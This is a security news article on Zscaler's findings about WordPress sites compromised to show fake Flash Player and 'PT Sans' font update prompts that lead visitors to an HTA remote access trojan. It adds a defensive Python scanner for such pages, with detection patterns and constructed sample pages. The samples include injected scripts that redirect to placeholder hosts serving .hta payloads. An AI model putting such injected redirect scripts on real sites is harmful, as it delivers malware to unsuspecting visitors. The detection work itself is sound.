Security vendor Zscaler has identified two related campaigns that use compromised websites to trick visitors into downloading malware.
Both campaigns “deliver a payload designed to steal sensitive information,” the firm said in a blog post. In the first variant, Zscaler explained, the attackers break into WordPress sites by exploiting a vulnerable theme plugin.
From there, they inject malicious redirect scripts into the site's pages. Visitors are then shown a fake Flash Player update alert; clicking the 'Update' button redirects them to a page that downloads the malicious file, and declining the update does not help.
“If the user clicks the ‘Later’ button, the redirect still occurs, taking the user to the same page to download the malicious HTA file,” Zscaler noted.
Once installed, the Remote Access Trojan (RAT) sends the victim's information to the attacker's server in encrypted form and gives the attacker remote access to the victim's computer.
In the second variant, the attacker “will directly inject the fake update template script by exploiting the legitimate site to evade detection,” Zscaler explained.
Visitors who open the compromised site in Chrome see an alert that the ‘PT Sans’ font was not found and are again prompted to download an 'update'.
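Both variants leave the same traces in the HTML a compromised site serves: an injected script that redirects off-site, a link or redirect target ending in .hta, and lure text about a Flash Player update or a missing font. The scanner below is an added example, not Zscaler's code; its indicator patterns are assumptions derived from the behaviour described above rather than published IOCs, and the three sample pages (site host example-blog.test, payload hosts update-cdn.invalid and fonts-fix.invalid) are constructed for illustration.

```python
"""Flag served HTML that carries the fake-update injection pattern (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed indicators, modelled on the described behaviour (not published IOCs).
REDIRECT_RE = re.compile(                      # JS redirect to an absolute URL
    r"(?:window\.|document\.|top\.)?location(?:\.href|\.replace|\.assign)?"
    r"\s*[=(]\s*['\"](https?://[^'\"]+)['\"]", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
LURE_RE = re.compile(
    r"flash\s*player[^<]{0,60}update"          # fake Flash Player update lure
    r"|font[^<]{0,60}(?:wasn.?t|not)\s+found"  # fake missing-font lure
    r"|PT\s+Sans", re.IGNORECASE)
PAYLOAD_EXTS = (".hta",)


def _is_payload(url):
    return urlparse(url).path.lower().endswith(PAYLOAD_EXTS)


class LureScanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__(convert_charrefs=True)
        self.site_host = site_host.lower()
        self.findings = []          # (kind, detail) pairs
        self._in_script = False
        self._script, self._text = [], []

    def _external(self, url):
        host = urlparse(url).netloc.lower()
        return bool(host) and host != self.site_host and not host.endswith("." + self.site_host)

    def _note(self, kind, url):
        self.findings.append((kind, url))
        if _is_payload(url):
            self.findings.append(("payload_link", url))

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script, self._script = True, []
            if a.get("src") and self._external(a["src"]):
                self._note("external_script", a["src"])
        for key in ("href", "src", "data", "action"):
            if key in a and _is_payload(a[key]):
                self.findings.append(("payload_link", a[key]))
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\";\s]+)", a.get("content", ""), re.I)
            if m and self._external(m.group(1)):
                self._note("meta_refresh", m.group(1))

    def handle_endtag(self, tag):
        if tag != "script":
            return
        self._in_script = False
        code = "".join(self._script)
        for m in REDIRECT_RE.finditer(code):
            if self._external(m.group(1)):
                self._note("inline_redirect", m.group(1))
        # A template injected as a JS string still exposes the payload URL and lure text.
        for m in URL_RE.finditer(code):
            if _is_payload(m.group(0)):
                self.findings.append(("payload_link", m.group(0)))
        for m in LURE_RE.finditer(code):
            self.findings.append(("lure_text", m.group(0)))

    def handle_data(self, data):
        (self._script if self._in_script else self._text).append(data)


def scan_page(html, site_host):
    """Return de-duplicated (kind, detail) findings for one HTML document."""
    p = LureScanner(site_host)
    p.feed(html)
    p.close()
    for m in LURE_RE.finditer(" ".join(p._text)):
        p.findings.append(("lure_text", m.group(0)))
    return list(dict.fromkeys(p.findings))


def is_suspicious(findings):
    """Lure text plus a redirect or payload link is the full fake-update pattern."""
    kinds = {k for k, _ in findings}
    return "lure_text" in kinds and bool(kinds & {"inline_redirect", "meta_refresh", "payload_link"})


# Constructed sample pages (not captures from real compromised sites).
SITE = "example-blog.test"
INJECTED_FLASH = """<html><body><h1>Welcome to my blog</h1>
<div id="overlay"><p>Your Adobe Flash Player is out of date. Please update now.</p>
<button onclick="go()">Update</button> <button onclick="go()">Later</button></div>
<script>function go(){ window.location.href = 'http://update-cdn.invalid/flash_player_update.hta'; }
setTimeout(go, 5000);</script></body></html>"""
INJECTED_FONT = """<html><body><p>Latest posts</p>
<script>var tpl = '<div class="fontbox">The "PT Sans" font was not found.</div>'
        + '<a href="http://fonts-fix.invalid/Font_Update.hta">Update</a>';
document.body.insertAdjacentHTML('beforeend', tpl);</script></body></html>"""
CLEAN = """<html><body><h1>Welcome</h1>
<script src="https://example-blog.test/wp-includes/js/jquery.js"></script>
<script>var x = 1; location.hash = '#top';</script>
<a href="https://example-blog.test/about">About</a></body></html>"""

if __name__ == "__main__":
    for name, page in (("flash", INJECTED_FLASH), ("font", INJECTED_FONT), ("clean", CLEAN)):
        found = scan_page(page, SITE)
        print(name, is_suspicious(found), found)
```

Note that both the 'Update' and 'Later' buttons in the Flash sample call the same redirect, matching the behaviour Zscaler described, and that the font variant never emits a real `<a>` tag, which is why the scanner also reads URLs and lure text out of inline script bodies. An external script on its own is recorded but not treated as suspicious, since legitimate sites routinely load third-party scripts.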
In total, Zscaler said it blocked more than 40,000 attacks related to the campaign over the preceding three months. The company recommends patching the vulnerable systems.
“In today's digital world, a company's website is its most valuable asset,” the firm concluded. “Therefore, it is critically important for companies to protect this public face from an attack that could put your business, employees, and your customers at risk.”